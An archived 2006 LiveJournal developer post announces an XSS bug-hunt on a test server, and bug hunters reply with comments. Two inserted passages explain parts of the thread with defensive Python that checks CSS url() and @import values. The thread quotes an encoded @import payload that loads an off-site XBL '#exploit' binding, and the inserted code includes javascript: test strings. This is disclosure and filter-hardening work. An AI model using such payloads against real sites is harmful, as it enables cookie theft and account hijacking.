Brad Fitzpatrick ([info]bradfitz) wrote in [info]lj_dev,
@ 2006-01-30 22:18:00
the XSS security challenge
Anybody bored and want a permanent account? Read on:

We're going to be running an XSS (Cross site scripting / Javascript injection) bug hunt challenge soon here. The biz people like the idea but need to squabble over rules and legal stuff. Unofficially, it'll involve giving out permanent accounts and money (or gift certificates).

So while I can't promise you jack right now in terms of money, I can give out permanent accounts like candy, so I'll announce the first round of the game:

STEP 1: Go to http://www.test.dev.livejournal.org/ . Make an account. Probably need to change it to paid so you can make styles/etc.

STEP 2: Inject some JavaScript. Use S1, S2, CSS, overrides, you name it. It'd probably help if you read the HTML and CSS cleaner code in cvs to look for bugs, but it's not required. If you want, the code is at:

cvs/livejournal/cgi-bin/cleanhtml.pl
cvs/wcmtools/lib/HTMLCleaner.pm
cvs/wcmtools/lib/CSS-Cleaner/lib/CSS/Cleaner.pm

CVS viewers are at http://cvs.danga.com/ and http://cvs.livejournal.org/ .

STEP 3: Email me (brad@danga.com) with subject containing at least "XSS-LJ", and a URL to a minimal test case illustrating your hole. I need to know how you did it, source code, maybe your test account's password, whatever it takes. The more clear it is, the more likely you win and I don't accept somebody else's later but more clear bug report first. After you find a hole, go create a new account for your next hole.

Brad's unofficial rules: I am judge, jury, and sole candy giver, at least until there are official rules. If I give you a permanent account, that doesn't mean you're not eligible for money/gift certificates later. We'll retroactively give that out for the best/hardest-to-fix/most-clever holes after the fact.

NOTE: The code running on the above URLs isn't live on the site yet. We don't care about holes at www.livejournal.com, because they're likely already fixed in the test code. The test code will go live on the site soon-ish. So reproduce (or produce) your bug reports on the test machine.

NOTE 2: The test machine above is a small virtual machine. I might not have given it enough memory. If it sucks, I'll increase it. Bear with me.


Page 1 of 2
<<[1] [2] >>



[info]vxjasonxv
2006-01-31 06:36 am UTC (link)
Free paid accounts? Whoo!
Oh wait, isolated database :(.


[info]anton
2006-01-31 06:43 am UTC (link)
Can't create an account at there: 'unable to connect' when opening https://www.test.dev.livejournal.org/create.bml


[info]andfarm
2006-01-31 06:48 am UTC (link)
Damn, I found mine (and reported it, natch) back in December.

Do I get a cookie?


[info]ashley_y
2006-01-31 07:23 am UTC (link)
And to think I paid $200 back in June...


[info]noweb4u
2006-01-31 07:37 am UTC (link)
check your email :)

Filtering out legitimate CSS?
[info]njyoder
2006-01-31 08:28 am UTC (link)
This gets filtered:
<div style="background-image: url('http://www.foo.com/foo.gif')">Test</div>

I think it's because of this line: return undef if $v->{value} =~ m!^url! && $v->{value} !~ m!^url[\'\"]?http://!;

Maybe I'm missing something, but doesn't that only match url'http://.... and not url('http://... ?

You can't use properly formatted url('...') properties.

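The regex behaviour described in the comment above, checked in code. This is an added example, not code from the LiveJournal cleaner: the page's Perl line is translated into Python (the regex semantics are identical), and fixed_check_allows is a hypothetical replacement that parses the url() form and whitelists the scheme instead of anchoring on a quote character. The test values are constructed for this example.

```python
import re

# The check as quoted from the cleaner in the comment above, translated from
# Perl: reject a value that starts with "url" unless it matches ^url['"]?http://
PAGE_PATTERN = re.compile(r'^url[\'"]?http://')


def page_check_allows(value: str) -> bool:
    """Behaviour of the quoted line: False means the declaration is dropped."""
    if value.startswith("url") and not PAGE_PATTERN.match(value):
        return False
    return True


# Hypothetical replacement (not the project's code): parse url( [quote] target
# [quote] ) explicitly, then whitelist the scheme of the target.
URL_FUNC = re.compile(
    r'^url\(\s*(?P<q>["\']?)(?P<target>.*?)(?P=q)\s*\)$',
    re.IGNORECASE | re.DOTALL,
)
ALLOWED_SCHEMES = ("http://", "https://")


def fixed_check_allows(value: str) -> bool:
    """Allow only a well-formed url(...) whose target uses a whitelisted scheme."""
    value = value.strip()
    if not value.lower().startswith("url"):
        return True  # not a url() value; other cleaner checks apply to it
    m = URL_FUNC.match(value)
    if not m:
        return False  # malformed url(), e.g. url'http://...' with no parens
    target = m.group("target")
    # Browsers decode CSS escapes (\6A avascript: -> javascript:), so refuse any
    # backslash, control character, whitespace, quote or paren inside the target
    # rather than trying to normalise them here.
    if re.search(r'[\\\x00-\x20\x7f"\'()]', target):
        return False
    return target.lower().startswith(ALLOWED_SCHEMES)


if __name__ == "__main__":
    # Constructed inputs: the legitimate value from the comment plus a few
    # shapes an attacker would try.
    for v in (
        "url('http://www.foo.com/foo.gif')",
        "url(http://www.foo.com/foo.gif)",
        "url'http://www.foo.com/foo.gif'",
        "url(javascript:alert(1))",
        'url("\\6A avascript:alert(1)")',
        "url(data:text/html;base64,PHNjcmlwdD4=)",
    ):
        print(f"{v!r:50} page={page_check_allows(v)!s:5} fixed={fixed_check_allows(v)}")
```

Run it and the first line shows the bug from the comment: the page's pattern rejects the properly formatted url('http://...') value while letting the malformed url'http://...' through, because the only thing it anchors on is an optional quote directly after "url". The replacement parses the parentheses first and then decides on the scheme, which is the check that actually matters.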

[info]automatonic
2006-01-31 09:11 am UTC (link)
Sent... something?



[info]caladri
2006-01-31 09:14 am UTC (link)
Sent you a Safari-specific one courtesy of documentation and running strings on the WebKit binary.



[info]tgies
2006-01-31 09:23 am UTC (link)
Found 2, but one might not be That Great. Emails sent.



[info]fd0man
2006-01-31 10:37 am UTC (link)
Very cool. I'm not that well versed in Perl, so I didn't understand much of the code, but it's great that people do. So far, everything I've tried didn't do any Bad Things, but, AFAIC, that's a Good Thing. Keep up the great work!



[info]jaebird
2006-01-31 01:34 pm UTC (link)
Haha, my MSN security had issues with your security tags.



[info]avatar
2006-01-31 02:40 pm UTC (link)
Isn't this a good way of giving the hackers permanent accounts? Or should we consider that okay since they're helping?


[info]ioannoula
2006-01-31 03:44 pm UTC (link)
Oooh well, what about when you can't pay for a permanent account? Is the problem going to be fixed? How can I fix it? I can't log in from my home PC and read my journal and my friends' journals, as I get "cannot find server"... What's this story with the cookies? I don't know what they mean. And I already changed the password and e-mail I am using for my journal; does this help solve the problem? Please let me know, I would love to have an answer from you. Thank you.

slashdot!
[info]immorak
2006-01-31 04:00 pm UTC (link)
http://it.slashdot.org/article.pl?sid=06/01/31/1324257&threshold=-1


[info]thehumangame
2006-01-31 04:29 pm UTC (link)
Heh, does the proof-of-concept exploit code I sent you on Jul 10 count? As I recall it embedded javascript into an offsite CSS stylesheet using IE-specific properties, which could steal non-http-only cookies and do anything a downloadable client could do using XMLHttpRequest.


[info]quadhome
2006-01-31 04:40 pm UTC (link)
The test machine appears to have gone down from the Slashdot stress. Is there any other way of testing exploit code?

I suppose the better follow-up question is, if it's perma-down, can I just e-mail the exploit code?


[info]azalemeth
2006-01-31 07:53 pm UTC (link)
I should just say that this is frankly a GREAT idea - and that you've been /.ed (though you know that already).

I'll snap my fingers and start typing after supper....


Broke CSS.pm?
[info]decadence1
2006-01-31 10:09 pm UTC (link)
I was poised to try getting in some JavaScript... chose one of the system styles as a base and went to the test journal I'd just made. No styling was on the journal though; was CSS stripped from poor old Tranquility II? Applying Tranq II to my regular journal over on LJ.com works fine.
  • http://dectest.test.dev.livejournal.org/res/91/stylesheet?1138744104 (winterice theme = no styling)
  • http://dectest.test.dev.livejournal.org/res/91/stylesheet?1138744496 (default = no styling)
Going to the above stylesheet URLs specified in the HTML source at the Recent Entries view displays this:

/* Cleaned CSS: */
/* Error parsing+validating CSS */
<b>Error running style:</b>
Invalid or unexpected property ' * { margin: 0' in style '@media screen, print' at /usr/share/perl5/CSS.pm line 76<br />

Am I missing something really obvious here? :-/


[info]legolas
2006-02-01 12:32 am UTC (link)
Could you grant me privileges to approve schools on the test machine (legolas also)?
I'll be looking for low-hanging fruit mostly, but who knows...



[info]panda_cookie
2006-02-01 02:16 am UTC (link)
Cuteness Attack does not work on the test server: http://pandatest.test.dev.livejournal.org/


[info]yukinoomoni
2006-02-01 03:35 am UTC (link)
Wait a second; so instead of making our already existing accounts permanent, we have to make new ones in order to get this?


[info]blackerlotus
2006-02-01 06:48 am UTC (link)
Found one thing™ and a bug, email sent.



[info]panda_cookie
2006-02-01 07:24 am UTC (link)
Found some bugs. Email sent. Sorry about the Cuteness Attack emails, earlier. :)


data: uri
[info]njyoder
2006-02-01 03:19 pm UTC (link)
This may be another vector for attack, but I couldn't find anything specific for it.

The current filter rejects this as not-understood CSS, but it's possible that in the future you may be able to insert this somewhere else and have it work, which necessitates a need for full whitelists.

This would have worked if it weren't for the fact that it either doesn't accept @import or it doesn't accept data: in that part of CSS.

@import "data:text/css;base64,cCB7IC1tb3otYmluZGluZzogdXJsKCJodHRwOi8vd3d3Lmd1bW1pYmVhcnMubnUvcG9jMi54bWwjZXhwbG9pdCIpIH0K";
(The above is )

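What the @import in the comment above actually carries, as an added example (not code from the page or from the LiveJournal cleaner). The base64 body of that data: URI decodes to a single rule, p { -moz-binding: url("http://www.gummibears.nu/poc2.xml#exploit") }, i.e. a Gecko XBL binding pointing at an off-site file, which a filter that only looks at the outer stylesheet text never sees. The example parses the @import target, decodes the data: URI, reports script-bearing properties found inside, and applies the same scheme whitelist to @import that url() values need. The sample line is the one quoted in the comment; the helper names are this example's own.

```python
import base64
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample: the @import line quoted in the comment above.
SAMPLE_IMPORT = ('@import "data:text/css;base64,cCB7IC1tb3otYmluZGluZzogdXJsKCJodHRwOi8vd3d3'
                 'Lmd1bW1pYmVhcnMubnUvcG9jMi54bWwjZXhwbG9pdCIpIH0K";')

# Accepts both spellings: @import "x";  and  @import url(x);
IMPORT_RE = re.compile(
    r'@import\s+(?:url\(\s*)?["\']?(?P<target>[^"\')\s]+)["\']?\s*\)?',
    re.IGNORECASE,
)
# data:[<mime>][;param...],<body>   (RFC 2397 shape; no scheme normalisation)
DATA_RE = re.compile(
    r'^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<body>.*)$',
    re.DOTALL | re.IGNORECASE,
)

# Properties that let a stylesheet run script in browsers of the period:
# -moz-binding (Gecko XBL), behavior and expression (IE).
SCRIPT_BEARING = ("-moz-binding", "behavior", "expression")


def import_target(css: str) -> Optional[str]:
    """Return the URL named by the first @import in css, or None."""
    m = IMPORT_RE.search(css)
    return m.group("target") if m else None


def decode_data_uri(uri: str) -> Tuple[str, bytes]:
    """Split a data: URI into (mime type, decoded body)."""
    m = DATA_RE.match(uri)
    if not m:
        raise ValueError("not a data: URI")
    mime = m.group("mime") or "text/plain"
    if ";base64" in m.group("params").lower():
        return mime, base64.b64decode(m.group("body"))
    return mime, unquote(m.group("body")).encode("utf-8")


def hidden_payload(css: str) -> List[str]:
    """Script-bearing properties found inside a data: @import, if any."""
    target = import_target(css)
    if target is None or not target.lower().startswith("data:"):
        return []
    _, body = decode_data_uri(target)
    text = body.decode("utf-8", "replace").lower()
    return [p for p in SCRIPT_BEARING if p in text]


def import_allowed(css: str) -> bool:
    """Whitelist: an @import may only fetch over http(s); data: and the rest are refused."""
    target = import_target(css)
    return target is not None and target.lower().startswith(("http://", "https://"))


if __name__ == "__main__":
    mime, body = decode_data_uri(import_target(SAMPLE_IMPORT))
    print(mime, "->", body.decode())
    print("script-bearing properties inside:", hidden_payload(SAMPLE_IMPORT))
    print("allowed by scheme whitelist:", import_allowed(SAMPLE_IMPORT))
```

The point the comment makes is the whitelist one: a filter that enumerates known-bad strings in the outer CSS would pass this line, because "-moz-binding" only appears after base64 decoding. Whitelisting the scheme of every fetched resource (url() values and @import alike) refuses it without having to look inside at all; decoding is only useful for understanding what was attempted.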


[info]noven
2006-02-11 02:42 pm UTC (link)
XSS is tricky. I've found an easy XSA vulnerability. Would that count?


